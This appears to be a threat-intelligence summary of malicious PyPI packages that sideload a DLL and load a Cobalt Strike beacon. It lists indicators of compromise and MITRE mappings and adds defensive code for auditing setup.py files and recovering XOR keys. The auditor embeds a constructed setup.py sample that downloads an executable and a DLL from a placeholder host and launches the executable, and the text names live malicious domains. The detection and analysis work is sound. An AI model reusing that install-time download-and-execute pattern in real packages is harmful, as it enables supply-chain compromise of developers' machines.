Attackers leverage PyPI to sideload malicious DLLs

ReversingLabs found two malicious PyPI packages (NP6HelperHttptest and NP6HelperHttper) whose setup.py runs at install time to download a legitimately signed executable (ComServer.exe) and a malicious DLL (dgdeskband64.dll). Launching the executable sideloads the DLL, which then fetches an XOR-encrypted Cobalt Strike payload and executes it in memory. Additional samples and shared infrastructure (e.g., us.archive-ubuntu.top, cdn.0c.sk) tie the packages to a broader supply-chain campaign. #NP6HelperHttptest #dgdeskband64dll

Keypoints

  • Two PyPI packages (NP6HelperHttptest, NP6HelperHttper) typosquatted legitimate NP6 helper libraries and shipped a malicious setup.py that runs during pip install.
  • The setup.py downloads ComServer.exe (a legitimately signed executable) and a malicious dgdeskband64.dll, then launches ComServer.exe; the trusted binary loads the attacker's DLL in place of the library it expects (DLL sideloading).
  • The malicious dgdeskband64.dll exposes a single DllInstall export that registers an exception handler, forces a division-by-zero to invoke it, and from the handler downloads a payload (an.gif) from us.archive-ubuntu.top.
  • an.gif is not an image but XOR-encrypted x86_64 shellcode; it is decrypted in memory, reveals a PE consistent with a Cobalt Strike beacon, and is executed through a callback registered with NotifyIpInterfaceChange.
  • Retro-hunting found related samples that use the same signed-EXE-plus-DLL pattern (windowsaccessbridge-64.dll) and a zip fetched from hxxps://cdn.0c.sk/1101012.zip, linking the PyPI activity to a wider campaign that reuses signing artifacts.

MITRE Techniques

  • [T1574.002] DLL Side-Loading – A legitimate signed executable loads the attacker's DLL, so the malicious code runs inside a trusted process (‘…executes the signed file ComServer.exe in a new process.’)
  • [T1105] Ingress Tool Transfer – The installer downloads external binaries (ComServer.exe and dgdeskband64.dll), and the DLL later downloads the encrypted payload (‘…setup.py Python script downloads the ComServer.exe and dgdeskband64.dll…’)
  • [T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools – Typosquatted packages on PyPI introduce the malware into developer environments (‘…employ typosquatting, using names that are nearly identical to one of the legitimate NP6 packages.’)
  • [T1059.006] Command and Scripting Interpreter: Python – The malicious behaviour rides on the Python install process itself, because pip executes setup.py (‘…contains a setup.py script, which extends setuptools commands with custom code designed to download two files…’)
  • [T1055] Process Injection / In-memory Execution – The shellcode is decrypted in memory and control is transferred to it through an API callback, so no conventional executable is written for the payload (‘…the shellcode is streamed to memory and the execution is then redirected to it through a callback registered for the NotifyIpInterfaceChange function.’). Note for detection engineers: the callback fires in the sideloading process itself rather than in a remote process, so this is in-process execution; T1620 Reflective Code Loading is the closer mapping for the embedded PE that is loaded without touching disk.

Indicators of Compromise

  • [PyPI package names and hashes] Malicious packages and versions observed – NP6HelperHttptest (SHA1: 1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4), NP6HelperHttper (SHA1: a65bce340366f724d444978dcdcd877fa2cacb1c), and additional NP6HelperHttptest hashes.
  • [Domains/URLs] Hosting and C2 infrastructure – fus.rngupdatem.buzz (malicious DLL host), us.archive-ubuntu.top (hosting shellcode payload), and hxxps://cdn.0c.sk/1101012.zip (zip archive used by related sample).
  • [File names and hashes] Malicious binaries and payloads – dgdeskband64.dll (PE/dll SHA1: 1f9fcf86a56394a7267d85ba76c1256d12e3e76b), windowsaccessbridge-64.dll (PE/dll SHA1: 84c75536b279a85a5320f058514b884a016bc8c8), an.gif (shellcode SHA1: 2dc80f45540d0a3ea33830848fcf529f98ea2f5e).

Rewritten technical summary:

The malicious PyPI packages carry a crafted setup.py that extends the setuptools command classes so that, at install time, it downloads two files: a legitimately signed executable (ComServer.exe) and a malicious DLL (dgdeskband64.dll). The installer then launches ComServer.exe, which is built to load a library named dgdeskband64.dll; the attacker-supplied DLL stands in for that library, exposes a single DllInstall export, and so turns the signed, trusted process into the host for attacker code. This is the point to look for on a developer host: a pip install that spawns a process, or that writes a PE and a DLL next to each other, is not normal packaging behaviour.
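The install-time hook described above is what a reviewer should look for in any package that ships a setup.py. The following is an added example, not code from the ReversingLabs post or from the packages themselves: it statically parses a setup.py with Python's ast module and flags setuptools command subclasses whose run() issues network or process-execution calls. The two embedded setup.py strings are constructed samples modelled on the pattern in the write-up (the download URLs are placeholders, not the real ones), and the sets of flagged modules are a starting point, not a complete list.

```python
"""Static audit of a setup.py for setuptools command overrides that download
or execute code at install time. Constructed example, not the original code."""
import ast

# Constructed stand-in for the NP6Helper* setup.py pattern (placeholder URLs).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, subprocess, os

class CustomInstall(install):
    def run(self):
        install.run(self)
        d = os.path.join(os.environ["TEMP"], "x")
        urllib.request.urlretrieve("https://example.invalid/ComServer.exe", d + "/ComServer.exe")
        urllib.request.urlretrieve("https://example.invalid/dgdeskband64.dll", d + "/dgdeskband64.dll")
        subprocess.Popen([d + "/ComServer.exe"])

setup(name="NP6HelperHttptest", version="0.0.1", cmdclass={"install": CustomInstall})
'''

# Constructed benign package for comparison.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="np6helper", version="1.0", packages=["np6helper"])
'''

# setuptools commands that pip runs during install/build and that are commonly hijacked.
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}
# Callee prefixes worth flagging inside an overridden run() (extend as needed).
NETWORK_PREFIXES = ("urllib.", "requests.", "http.client.", "socket.")
EXEC_PREFIXES = ("subprocess.", "os.system", "os.popen", "os.startfile", "exec", "eval", "ctypes.")


def _dotted(node):
    """Return 'a.b.c' for Name/Attribute chains, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _matches(callee, prefixes):
    return any(callee == p.rstrip(".") or callee.startswith(p) for p in prefixes)


def audit_setup_py(source):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    tree = ast.parse(source)
    findings = []

    # 1. Classes that subclass a hookable setuptools command.
    cmd_classes = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            bases = [_dotted(b) or "" for b in node.bases]
            if any(b.split(".")[-1] in HOOKABLE_COMMANDS for b in bases):
                cmd_classes[node.name] = node

    # 2. Does setup() actually register them via cmdclass=?
    uses_cmdclass = any(
        isinstance(n, ast.Call) and _dotted(n.func) == "setup"
        and any(k.arg == "cmdclass" for k in n.keywords)
        for n in ast.walk(tree)
    )

    # 3. Inspect every overridden run() for network and execution calls.
    for name, cls in cmd_classes.items():
        for fn in cls.body:
            if isinstance(fn, ast.FunctionDef) and fn.name == "run":
                for sub in ast.walk(fn):
                    if isinstance(sub, ast.Call):
                        callee = _dotted(sub.func) or ""
                        if _matches(callee, NETWORK_PREFIXES):
                            findings.append(f"{name}.run: network call {callee} (line {sub.lineno})")
                        if _matches(callee, EXEC_PREFIXES):
                            findings.append(f"{name}.run: process/code execution {callee} (line {sub.lineno})")

    if cmd_classes and uses_cmdclass:
        findings.insert(0, f"setup() registers custom command class(es): {', '.join(cmd_classes)}")
    return findings


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(label, audit_setup_py(src) or ["clean"])
```

Run it over the sdist's setup.py before installing (download with `pip download --no-deps --no-binary :all: <pkg>` and unpack), and treat any finding as a reason to read the file by hand; a setup.py that only calls setup() with metadata should produce no findings. The AST approach does not execute the file, which matters precisely because executing it is the attack.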

Inside DllInstall the malware registers an exception handler and then deliberately divides by zero; the handler, not the normal control flow, carries execution into the malicious routine, which issues an HTTP GET for an.gif from us.archive-ubuntu.top. The file is not an image but XOR-encrypted x86_64 shellcode. The DLL decrypts it in memory and transfers control to it through a callback registered with NotifyIpInterfaceChange, so the payload runs without a conventional executable being dropped. Both detours (exception handler, API callback) keep the handoff to the shellcode out of the direct call graph that a quick static or sandbox pass would follow, which is why the DLL's single exported function looks almost empty on its own.
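When a blob like an.gif lands in a triage queue, the first analyst task is recovering the XOR key so the embedded PE can be carved and matched against Cobalt Strike signatures. The block below is an added example, not code from the ReversingLabs post: it runs a known-plaintext attack on repeating-key XOR, using the DOS stub string that a PE decrypted from the blob is expected to contain, and it generalises beyond the page by handling any key of up to 16 bytes rather than a single-byte key. The key length and scheme of the real an.gif are not stated on this page, and the sample payload, prefix bytes and three-byte key here are all constructed for the example.

```python
"""Known-plaintext recovery of a repeating XOR key from a payload that decrypts
to an embedded PE. Constructed example; the real an.gif key is not on this page."""

# Present in the DOS stub of almost every PE, including reflectively loaded beacons.
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_repeating(data, key):
    """XOR data with a repeating key (encrypt and decrypt are the same operation)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(ct, known=DOS_STUB, max_key_len=16):
    """Slide `known` over every offset of the ciphertext. At the right offset the
    XOR of ciphertext and known plaintext is a keystream fragment that repeats with
    the key's period; rotate it back to offset 0 and return (key, offset).
    A period is only accepted if it is confirmed at least twice within the window.
    Returns None when no periodic keystream is found."""
    n = len(known)
    for off in range(len(ct) - n + 1):
        ks = bytes(c ^ p for c, p in zip(ct[off:off + n], known))
        for klen in range(1, max_key_len + 1):
            if 2 * klen > n:
                break
            if all(ks[i] == ks[i % klen] for i in range(n)):
                # ks[i] == key[(off + i) % klen], so key[m] == ks[(m - off) % klen]
                key = bytes(ks[(m - off) % klen] for m in range(klen))
                return key, off
    return None


def locate_pe(pt, stub_offset):
    """Offset of the 'MZ' header that precedes the DOS stub text, or -1."""
    return pt.rfind(b"MZ", 0, stub_offset)


def analyse_blob(ct):
    """Recover the key, decrypt, and locate the embedded PE. None if no key is found."""
    hit = recover_xor_key(ct)
    if hit is None:
        return None
    key, stub_off = hit
    pt = xor_repeating(ct, key)
    return {"key": key, "stub_offset": stub_off, "pe_offset": locate_pe(pt, stub_off), "plaintext": pt}


# --- constructed sample: a short shellcode-style prefix followed by a minimal DOS header/stub ---
PREFIX = b"\xfc\x48\x83\xe4\xf0\xe8\x00"           # constructed, not real beacon bytes
DOS_HEADER = b"MZ" + b"\x00" * 0x3c                # e_magic plus zeroed header fields
DOS_CODE = b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"  # classic stub code
PLAIN = PREFIX + DOS_HEADER + DOS_CODE + DOS_STUB + b".\r\r\n$" + b"\x00" * 32
KEY = b"\x5a\xc3\x19"                              # assumed 3-byte key for the example
CT = xor_repeating(PLAIN, KEY)

if __name__ == "__main__":
    r = analyse_blob(CT)
    print("key", r["key"].hex(), "pe at", r["pe_offset"], "stub at", r["stub_offset"])
```

If the attack returns None on a real sample, the usual reasons are a key longer than max_key_len, a stub string that the packer stripped, or a scheme that is not plain XOR (rolling keys, RC4); in that case fall back to the known-plaintext bytes of the Cobalt Strike reflective-loader prologue, or simply hook the decryption routine in a debugger and dump the buffer after it runs.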

Retro-hunting surfaced further samples that use the same delivery pattern (a different signed executable paired with a malicious DLL, e.g., windowsaccessbridge-64.dll) and shared infrastructure (hxxps://cdn.0c.sk/1101012.zip). The decrypted in-memory payload carries artifacts consistent with a Cobalt Strike beacon, tying the PyPI packages to a broader supply-chain campaign that reuses domains, zip archives, and signing artifacts; the reused DLL hashes and domains in the IOC list above are therefore the most durable pivots for hunting beyond the two package names.

Read more: https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls